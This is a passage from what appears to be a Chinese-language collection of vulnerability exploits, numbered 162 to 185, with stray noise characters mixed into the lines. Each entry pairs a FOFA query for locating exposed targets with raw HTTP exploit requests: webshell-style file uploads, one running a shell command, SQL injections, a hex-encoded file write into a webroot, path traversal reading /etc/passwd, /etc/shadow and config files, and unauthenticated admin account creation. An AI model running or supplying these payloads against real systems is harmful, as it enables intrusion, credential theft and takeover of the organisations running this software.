: x9 S- P3 K. ]9 w9 |$ P0 B# {7 g6 [) C3 k0 C' M+ p
# y @+ p9 Y4 `7 ahttp://x.x.x.x/dizxdell.aspx
" l8 I4 {' C8 q/ P; B6 U
0 c7 A. D4 y/ E# c7 R9 a$ a162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传* M) q- u7 d+ K; M0 B& [& G B. b
FOFA: app="和丰山海-数字标牌"( W: Q' d" R. D$ }+ D) c
POST /QH.aspx HTTP/1.1
2 ^$ p" v# i1 J0 q* R4 qHost: x.x.x.x
3 D! N2 ^0 H$ a1 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0# G n0 N8 d, d6 h2 I2 I
Connection: close
0 n9 s3 f. N& E/ }" _Content-Length: 583
% V! p. N! T9 _7 I" R( l# L* L4 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey. n, o- u" L( a# L9 f
Accept-Encoding: gzip
! I3 x6 _) _% V$ c7 L4 O9 V* [% C- q9 v( N1 f
------WebKitFormBoundaryeegvclmyurlotuey0 \* X- e, v6 a- s7 i
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
6 a; O/ V+ T0 G; Z0 @Content-Type: application/octet-stream
, m0 |9 Z Y" S5 w' |+ }" F, M& P: y" I& }4 P+ J- O+ ?
<% response.write("ujidwqfuuqjalgkvrpqy") %>6 ~7 u- @/ X" r5 s. A; e
------WebKitFormBoundaryeegvclmyurlotuey& ~4 B: q, k$ r# q! s
Content-Disposition: form-data; name="action"
% _. I( O" J! J2 _7 S
: e- i0 O( O' U" _upload6 {0 n$ Y) J: r! [; {
------WebKitFormBoundaryeegvclmyurlotuey
# @6 K* h1 `/ O3 A8 K: s u3 DContent-Disposition: form-data; name="responderId"1 k/ ^* ]) _: D" a6 j
/ I, m5 t' U Z6 M- ]/ lResourceNewResponder0 W5 @# [9 N, M
------WebKitFormBoundaryeegvclmyurlotuey7 ~) R8 _/ l2 |1 b: M
Content-Disposition: form-data; name="remotePath"' F$ D2 o. x0 T7 G
& a% B! H: x5 T1 j* W6 Y9 f5 R
/opt/resources
7 K* ?- W$ Z1 t2 l8 m: H i: j------WebKitFormBoundaryeegvclmyurlotuey--
% x2 s. B j$ y0 T0 y$ a: t C' v: X/ c6 B4 J( o9 D
, U# e% a' A) ?; z2 S$ N
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
' J( O+ k8 |, \0 _
2 x& n9 D$ d' b8 B163. 号卡极团分销管理系统 ue_serve.php 任意文件上传* k- S! v! |# z7 k
FOFA: icon_hash="-795291075"& d: u6 ?: t! o% G: p
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
0 \! H- Y# |, S) s. kHost: x.x.x.x/ P. T- u. c! o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.364 P! ^% Y- ?6 v0 U; [
Connection: close
- g5 I& e, g; Q( O# b: T3 LContent-Length: 293
( a$ b& q g1 _' M7 [Accept: */*6 m) O- s0 I' Q1 g# \# g9 \
Accept-Encoding: gzip, deflate) G. ?2 t V5 A
Accept-Language: zh-CN,zh;q=0.9
9 {' n+ V* Y5 x8 D' B' D SContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
5 {1 |- M1 `7 h3 Z& _! g2 [6 f6 \6 }( O' W) a
------iiqvnofupvhdyrcoqyuujyetjvqgocod" ~ l4 p7 ]" b% j# M
Content-Disposition: form-data; name="name"4 a O [$ |1 N# ~" E6 V7 Z
$ ?4 f* L9 p; m; q7 f) e5 g6 z1.php
; k3 ^( n7 [1 X4 o! ^' Y- C1 A------iiqvnofupvhdyrcoqyuujyetjvqgocod
* w2 m" T% y( U0 WContent-Disposition: form-data; name="upfile"; filename="1.php"
$ c/ D5 I* D; _, u' eContent-Type: image/jpeg
5 [0 L1 F; |$ j4 c( X1 |2 Q/ \! ?: X Y1 Q. d6 {! B( Y
rvjhvbhwwuooyiioxega
* i7 R( B% p8 ^/ s- b A------iiqvnofupvhdyrcoqyuujyetjvqgocod--
" ~# ^/ z) s L3 }2 Y: p! K; V4 r! \* `0 T; S+ b' F
8 ^3 d4 x0 ^% Q) a+ W( b
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传7 v4 L0 |* S- Q! |" o
FOFA: title="智慧综合管理平台登入"
- J+ [6 u- s: R1 bPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
: }1 U. w2 O d2 N3 g! NHost: x.x.x.x
; q" o/ }* h* z8 N, LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' i' V5 N8 u7 l+ C2 C% N# @0 Q
Content-Length: 288
* g0 q: E+ x' I! p6 TAccept: application/json, text/javascript, */*; q=0.01 F( S A' s$ J: s v& w- G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,: y* D% s6 r; f* y! [# v! K& c
Connection: close
8 O: B7 U! ]4 k1 QContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
; s0 H, d" \8 [ j7 GX-Requested-With: XMLHttpRequest- J) o- T/ t( z: O/ x2 d
Accept-Encoding: gzip
2 v4 z+ b" R$ q7 v( k: Q% [8 ^5 d1 z/ D9 C
------dqdaieopnozbkapjacdbdthlvtlyl1 E* i7 }+ @- T7 i6 z6 p) `8 n
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"7 \7 _& x g& L3 J( @& G; o
Content-Type: image/jpeg
; ^) S; y/ {. c" u4 C: \$ }$ i. @: J( E8 x, _5 A
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>) Z7 Z6 c8 R V2 }. C) t
------dqdaieopnozbkapjacdbdthlvtlyl--
; W H* B+ Q7 x# g; `0 j
8 \6 b) c7 N4 V; k! F: m f& O! @1 k% m) Y2 U! h
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
7 ], S, |+ r6 a4 h! W4 e7 w
. [$ _- d& k5 L. m: ? A165. OrangeHRM 3.3.3 SQL 注入
/ S# k4 m8 c9 @1 ACVE-2024-36428
+ O$ k# I4 }9 B* nFOFA: app="OrangeHRM-产品"
9 L7 p, g4 _ r6 T( T9 _! {6 bURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
8 ~5 o5 a+ E+ q( M# T
4 |8 ]0 n7 D3 f1 n% `6 q# _
2 N3 ~) ], M6 I9 ?5 o- {* K166. 中成科信票务管理平台SeatMapHandler SQL注入
4 j% K' H# N3 k, P3 w9 I1 @FOFA:body="技术支持:北京中成科信科技发展有限公司"
* _4 p. I" C! i( |2 S8 d3 iPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
2 i4 D* S+ }' zHost:
' G4 S: p/ H+ p3 p$ Y! a3 mPragma: no-cache7 f4 p! c4 g! k
Cache-Control: no-cache- d9 X/ O; c, P2 V; `
Upgrade-Insecure-Requests: 1, \% }( v$ ^) Q# D: }8 Q! |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36' i1 m& R6 x; ^& k; G( |$ s6 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" Y) n6 v- |0 x1 L
Accept-Encoding: gzip, deflate3 F9 ^& ^# S8 p& w
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8# c& Q! L1 w N$ P$ P. f; i
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
+ ]; ]$ L8 Q6 y1 j) X9 VConnection: close
# w- Z9 a8 W. H+ OContent-Type: application/x-www-form-urlencoded$ K2 H. [* P) u/ s3 H* v3 l6 S
Content-Length: 89
& F) m6 h3 L1 j3 h
+ u/ u) r5 c' |# ^% UMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
/ c, e/ b1 a3 L% O" B3 t- w& A. Y. W( m. T2 H( |- e
* X$ \+ }5 k9 n/ Y5 @ E
167. 精益价值管理系统 DownLoad.aspx任意文件读取5 z3 Z, v. h: q% Y7 I& ~, F# G
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"" ]& H( Q3 ]0 |+ h' b2 D8 @
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
, P( [* [( T8 E2 uHost:
( ~9 N" ]. c8 A: O8 t7 K0 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' C& x) ^. b5 b
Content-Type: application/x-www-form-urlencoded
6 r. ?9 H1 K+ P* `8 s; D$ g# gAccept-Encoding: gzip, deflate
/ T- l' @, C! G3 g) \Accept: */** O+ h7 K; q# Z) l
Connection: keep-alive
8 g1 t# q- V5 l, G* h/ S+ H5 j! u( X
4 e V* [6 {& u# B. o1 f
168. 宏景EHR OutputCode 任意文件读取9 b" G/ |9 Z& V; h4 O1 Y* M
FOFA:app="HJSOFT-HCM" v. t& _/ L7 A4 g6 q y
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
+ s6 \/ e# H7 t6 qHost: your-ip6 l. m# I) F$ q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
4 p: n, H1 j+ ]% YContent-Type: application/x-www-form-urlencoded1 B/ P. l; d1 y( S) c5 d
Connection: close
. l; S; h2 e$ f: d3 P2 d& C: w& Q! h
# b! }8 c- Z* O6 l; [, x
' V& w; I `, m5 `2 D7 R
# D5 p# `3 @5 f* D( D3 M6 i169. 宏景EHR downlawbase SQL注入
- U- {/ w/ j O4 @FOFA:app="HJSOFT-HCM"1 b1 N' ^. y8 k. S }
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1; L; B2 C( D. w/ q( ?5 V" j
Host: your-ip" g, G" L* W* u5 q9 ?% t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
f9 c9 l4 R/ j% q) L' V# Z7 hAccept: */*. b! L# N( @) Z3 l
Accept-Encoding: gzip, deflate' y- v) ~! J: c" W
Connection: close
) H3 @; A( r8 P( n$ B/ f# L4 X3 E# u; I; D, r: D8 b. O
# L) P: I$ {1 v) m" i) x) u! ]; S
170. 宏景EHR DisplayExcelCustomReport 任意文件读取; i+ D9 H6 U ]5 x: j# b
FOFA:body="/general/sys/hjaxmanage.js"
B+ J) V3 b, S8 l/ APOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
( [; y9 h! ?7 i$ Z, A dHost: balalanengliang
8 m- y7 L6 D0 B; V- ?/ g* VUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 X* B. x/ J- m+ jContent-Type: application/x-www-form-urlencoded
+ S$ o4 [+ y. H7 Y! U& J: v
% }* n a/ B" g% Ifilename=../webapps/ROOT/WEB-INF/web.xml
/ K& X$ P g H8 u" g6 W) J2 m$ D4 a2 u2 G* K
$ b: K/ u* \ Q1 b( g: E171. 通天星CMSV6车载定位监控平台 SQL注入7 x! C* q1 R7 u8 T
FOFA:body="/808gps/"
, t1 v$ k5 y% Z- {1 c6 f8 XGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
# n/ ]% ?6 C' e3 i1 n7 CHost: your-ip
2 T# F1 Z( I& R6 B: B. @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0& G: w& `; Z( h% E
Accept: */*
v* h R. ^* z' K+ AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ E0 b8 D% @. L3 R) l+ ^Accept-Encoding: gzip, deflate- H9 C& u; T: w1 j
Connection: close( Y1 B* P, |$ I1 P& X: p/ Z
- E7 _6 o. [- Q9 ~0 X, r' ^) k- G7 B G) ~% V
8 ?8 F- g! N- z+ O$ Y
172. DT-高清车牌识别摄像机任意文件读取1 M. ]( j- C- b2 G' Q" l1 V. w8 R
FOFA:app="DT-高清车牌识别摄像机"
% ^% s) w" D1 q. V* u3 KGET /../../../../etc/passwd HTTP/1.1' S% _3 l+ m3 U3 ^; B& u; m
Host: your-ip
' M0 S) y* p$ j7 j( R/ Z$ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ \/ }) n8 T$ f; OAccept-Encoding: gzip, deflate
. Q; h" _8 ]% x2 yAccept: */*0 v& D' L* U3 d+ ^$ I3 X6 l( J
Connection: keep-alive5 x* w8 Q' c1 ~0 q& j* D
3 Z# q3 P0 }! a1 ~' {1 o7 ?3 `
+ x! `, B+ _- A* q2 y: w0 {5 x
$ a5 p$ G8 E- D* }
173. Check Point 安全网关任意文件读取6 f* O" t+ C- P
CVE-2024-24919
6 E; ~9 {* c! x. `1 \, T* eFOFA:app="Check_Point-SSL-Network-Extender"
" p( I6 | P2 |* s0 U! J+ |POST /clients/MyCRL HTTP/1.1
: k, s7 u: u) A/ A9 v8 e1 ]$ }" hHost: your-ip
1 \1 X6 u3 N9 pContent-Type: application/x-www-form-urlencoded
% B2 Y) A* r# V
3 a, ]7 {% Q/ K# \% ]* waCSHELL/../../../../../../../etc/shadow
: A4 ~+ {5 i$ W# [: V! X6 Y; N4 W- ]. Y2 n; [0 `) G' M9 K* Y& v
# }, i$ Y$ V% X
. d7 w7 Z4 N+ h6 o: z" G174. 金和OA C6 FileDownLoad.aspx 任意文件读取* l$ L$ k; O0 l0 U4 X) T4 W. z
FOFA:app="金和网络-金和OA"; Q% e' e0 z( A* M$ ~6 w" z! g
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
- c9 I, B& L6 z& {) _. gHost: your-ip( f/ o l! p& O J( V2 o* r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 g. @' Q- j% S" d$ ^4 u' j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% g! q: t8 W6 jAccept-Encoding: gzip, deflate, br5 h7 L3 C$ w& ?6 Z/ |( l! @
Accept-Language: zh-CN,zh;q=0.9( O, _* j0 F7 I; v! y
Connection: close
i" X3 c4 w! K ~1 m
% Q& F! f1 x0 s8 _- C3 g) c; p \! z4 i' c# E
" h7 _8 U8 k3 u5 \& y: G175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入7 ~; b. r m9 ^4 r3 Z* u/ e
FOFA:app="金和网络-金和OA"
/ y. J4 m* [9 u* D+ ?- t' {GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1# ]3 o$ U: w/ C3 f4 {. k; m; t
Host:; A; R$ v8 a; B% `
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- p: h! F2 P" e# f5 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# [: ?% l! b m6 `: _7 f }$ y" _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% h' I1 k+ g0 u# {4 a+ N
Accept-Encoding: gzip, deflate4 s, Q! k) o6 ]% f0 k" L! F
Connection: close
* |! D$ i" i+ r. zUpgrade-Insecure-Requests: 14 v, p$ ?+ L& y
$ h' y* C8 v% n( l* s
& u: h, l4 ?/ Y& f. W8 y
176. 电信网关配置管理系统 rewrite.php 文件上传" e" M/ n# X5 t
FOFA:body="img/login_bg3.png" && body="系统登录"
; q6 Y3 ?2 J) a8 m9 S7 W: IPOST /manager/teletext/material/rewrite.php HTTP/1.1
_9 t) m1 h( x& aHost: your-ip7 w# m6 v+ l+ b1 h' n, }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- G; r5 `5 M* |7 P8 `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
5 j" X. k4 G/ w' |1 j+ l# N9 Y5 `Connection: close, q' d8 o7 h0 w& M/ @& A
3 F9 j9 A! z/ `6 l# C8 K------WebKitFormBoundaryOKldnDPT
3 s9 I/ _4 [4 m4 V; \, aContent-Disposition: form-data; name="tmp_name"; filename="test.php". _0 y/ Z. R0 l+ B. c) T6 N5 N' x
Content-Type: image/png# i4 w9 f9 V* k& m: ?) Y
6 l' }- m7 y4 E2 n/ O4 e
<?php system("cat /etc/passwd");unlink(__FILE__);?>
. l5 X7 u1 o: a6 |' W q------WebKitFormBoundaryOKldnDPT" Y( m& `/ \) h2 S4 J( t3 N4 X
Content-Disposition: form-data; name="uploadtime"* ~, I1 X3 {$ |# M! _
3 ]# Z; I/ K v' Z/ @! o
$ K: C5 n& A! A0 n
------WebKitFormBoundaryOKldnDPT--
* ~8 w5 W4 _* w' \! c& e8 u- {- t" d# |2 B2 g
2 f9 B2 v$ ^$ z
- }7 P+ O# }) t! ~5 |177. H3C路由器敏感信息泄露
3 j; K8 }' a5 w5 e% Q! ~$ i* [: ]* o8 Z/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg5 p1 n |3 s& U l( d; ^7 z/ @( V
/userLogin.asp/../actionpolicy_status/../M60.cfg C6 `' o: F# _) J0 P* q
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
$ c% ?. F1 J4 Y- g/userLogin.asp/../actionpolicy_status/../GR5200.cfg
7 k+ I% {! T& @8 k$ O- W) d3 g/userLogin.asp/../actionpolicy_status/../GR3200.cfg2 D, f! L" }# B/ C f
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
& h. Q$ n( G* `# s/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg, t. s) X( |: H! f
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg0 H, M* P1 S% Y' A# m/ |% C2 [
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
: a: _0 g [% ?" r/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg) ~* m7 n% u: D r
/userLogin.asp/../actionpolicy_status/../ER5200.cfg# R) }) ?" w( O; i
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
8 z2 c- T! j; v7 o1 E/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
& [' y+ P1 |2 c& d' [/userLogin.asp/../actionpolicy_status/../ER3260.cfg6 n; V: Y. b4 U; U: y% o) T/ m
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg2 L8 J! f% E2 U8 B1 M
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
# N* u5 _4 @. N2 t& k/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
8 x# J- u! \$ T/userLogin.asp/../actionpolicy_status/../ER3108G.cfg- c0 P7 }. X0 F F& j$ D
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg; c# n$ [( |/ A B% u' ~1 {! q
/userLogin.asp/../actionpolicy_status/../ER3100.cfg2 L2 o5 A9 |/ |6 H- {% d/ I3 ^9 N
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg* z, W9 ? [1 I; A9 z6 t
* Q3 X; q) y$ y$ } G5 }4 H" t% [" \4 ~, H+ T7 L
178. H3C校园网自助服务系统-flexfileupload-任意文件上传! Z6 q7 m; l2 t( H! R! h& `; q
FOFA:header="/selfservice"4 E/ ]) r# H9 K/ q# z4 [
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.14 V9 M6 c' H) r) w+ K
Host:0 p I( ?3 Z1 h; o( ?# K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ d4 W7 z+ b% q5 X; Q. S/ VContent-Length: 252" H5 V: l6 n+ {4 P. F1 v, ]3 a
Accept-Encoding: gzip, deflate3 v6 p3 c6 \$ r+ C
Connection: close
3 A/ y( ^$ q3 t: P( |7 N8 `5 y# XContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l+ Q1 l1 V% L: c& a
-----------------aqutkea7vvanpqy3rh2l
6 F, V- B' r0 _6 t8 y! _Content-Disposition: form-data; name="12234.txt"; filename="12234"
9 t* M5 l! c V4 I5 f, HContent-Type: application/octet-stream0 d `6 n% ]4 ]1 E1 T3 W3 D! B
Content-Length: 255
1 w1 V0 d* \) J: M( n. B& o% R. n. K) O6 S, T$ ^( U
12234! ]% e9 v, X* z. d( V$ D/ w+ g1 m
-----------------aqutkea7vvanpqy3rh2l--( h* d% [+ F" Q. r/ A
9 S/ ~" N( L1 U' C" l' z
% R! A3 u N v+ T4 U
GET /imc/primepush/%2e%2e/flex/12234.txt+ ]6 R7 ]1 k5 @/ e, @/ w
- d8 M7 v& |& b" z
- h# ^. [ _8 |* e179. 建文工程管理系统存在任意文件读取* L* m$ Q1 p7 v8 n$ @+ G' W
POST /Common/DownLoad2.aspx HTTP/1.1
% ~. Q# ?9 w; F' y% Z/ PHost: {{Hostname}}
& E9 ~- r1 i5 S6 |2 `. _& Y. TContent-Type: application/x-www-form-urlencoded. Z, l" R+ p: L$ ]
User-Agent: Mozilla/5.0
/ k* r e9 v3 U- [1 M2 m1 c( l9 U* J' B9 }& i2 _
path=../log4net.config&Name=
4 j. S; H. H2 I+ S- T- ~7 c" \1 _
+ u$ r3 v! g# Z+ A( J
1 p4 H6 b: O$ y180. 帮管客 CRM jiliyu SQL注入
# J7 Q: ?0 a: N W+ w( dFOFA:app="帮管客-CRM"
" F* Q' T( y: v: I+ g$ u: AGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
+ w7 m0 ~( K6 U. W9 XHost: your-ip9 Q5 R% |3 `/ H. I% X. L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& z* a8 p2 _$ w6 o- T% ?# P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 v/ Y2 }. X2 o/ I3 ?
Accept-Encoding: gzip, deflate# A1 q( L2 x. I& I; q; g4 y* H P
Accept-Language: zh-CN,zh;q=0.9
, d& |1 z, s$ W% S" j& qConnection: close# P( u5 x# K7 p3 ]2 I% v% k0 P% K/ c3 h
8 w+ Z3 T$ H) N4 ]* M/ C9 f
- P, i! m, D% ?181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入! W4 O+ N8 Q0 X# a6 P( ^
FOFA:"PDCA/js/_publicCom.js"+ u: K' q1 J1 H1 i. T
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
; J q$ g" I; G4 iHost: your-ip
- I, y+ l( }# v1 w" }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.367 k& u# C9 ^. S% o' S1 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) H& z8 o. [; [2 m1 B* R' h# XAccept-Encoding: gzip, deflate, br
) N' w! g; `8 c$ JAccept-Language: zh-CN,zh;q=0.9
$ g7 p9 G) j5 ?" T# SConnection: close: E7 A7 c- n7 d
Content-Type: application/x-www-form-urlencoded
$ y" M1 d$ P; v5 Z$ S* [& R1 P: f; Q+ x4 M4 I; l- ^
V r# h1 `, L: a" ?% S
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
' ?! R2 u/ C! S, J$ h/ i0 A" B: r, E' ?+ B F8 R3 f Z
5 x( {2 F7 F8 o% N9 n
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
" Z- r0 E+ d8 [6 d: E! {- SFOFA:"PDCA/js/_publicCom.js"+ u$ ?% X7 x! X; K! X( t# p
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1: x7 ^/ |$ e; F4 U
Host: your-ip: Z" D( C& ]- k. M! p- N+ b# d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1 L9 J( f# I) f" HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" }6 a. d# {. L% ~) f
Accept-Encoding: gzip, deflate, br; q- F. {1 U! W+ o e, A/ V8 \/ h
Accept-Language: zh-CN,zh;q=0.9
, a, C- R& A5 G. L$ C8 h8 E* VConnection: close( \, |; c. r' D( S7 ?! g
Content-Type: application/x-www-form-urlencoded( p; f+ M2 t' G) @
$ E9 O# k7 y! I3 ~' b! m9 E. A% f: P0 P( g, z0 O3 @- |
username=test1234&pwd=test1234&savedays=1
8 ?2 u# ]) M. i# Q2 p' ^% A" J
# h( d+ X& z7 N# S/ w/ M/ t3 z6 i: G8 C; x1 {
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入4 e! {9 p+ W# L- t J% Q: G4 K! @
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
# |: c" d* r$ v" _. \! iGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
! o5 m& w5 J4 W2 J) P/ SHost: your-ip
5 \+ y5 D4 S+ k& KUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ O: }7 ]. I) C0 t
Accept-Charset: utf-8
, ^! u2 W4 [* @1 R0 `& T2 b; z6 {Accept-Encoding: gzip, deflate' n" J; F. M+ K! I
Connection: close
* M" X2 D) E; S+ Y0 ?1 l4 t2 s+ U8 |: \- P& h
5 U: Y7 a* ?* K' ` w184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加5 d9 C7 c% G* U8 }+ @/ K/ q1 ]* t
FOFA:server="SunFull-Webs"
3 a5 ^! Y4 i2 U3 P+ w! T- ^POST /soap/AddUser HTTP/1.1* n* Q$ d. H. q& f5 |4 @8 ]2 s
Host: your-ip) l, H. _3 z0 V m, ^1 ~
Accept-Encoding: gzip, deflate& @; }4 T! \6 f; R# M3 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0: J; W& @3 X' q, z5 t9 }
Accept: application/xml, text/xml, */*; q=0.01
h" ]% Y9 ]7 RContent-Type: text/xml; charset=utf-8
, X* O5 Z# U/ |# A' d: oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" W& z) j& \- M3 U- AX-Requested-With: XMLHttpRequest5 t1 F1 R* o$ F2 r0 L
, e' u1 R5 b9 M" l$ p4 p1 _
6 I; E6 n7 ~& @4 ?$ Y2 g1 H8 hinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')$ z- [6 U$ p* o$ h0 E8 z3 s
6 w# f ~* \" z
# ^! x% j/ z) w- l' w185. 瑞友天翼应用虚拟化系统SQL注入' ~6 S# h. ?$ w5 [/ }+ f
version < 7.0.5.10 W" c- _3 s% J) l$ N1 d& [
FOFA:app="REALOR-天翼应用虚拟化系统"0 y s# |, o+ D, I0 v( u
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1& o) ], e; H% o/ }. ?2 x( C
Host: host* K- j7 ^4 b9 m9 j) _
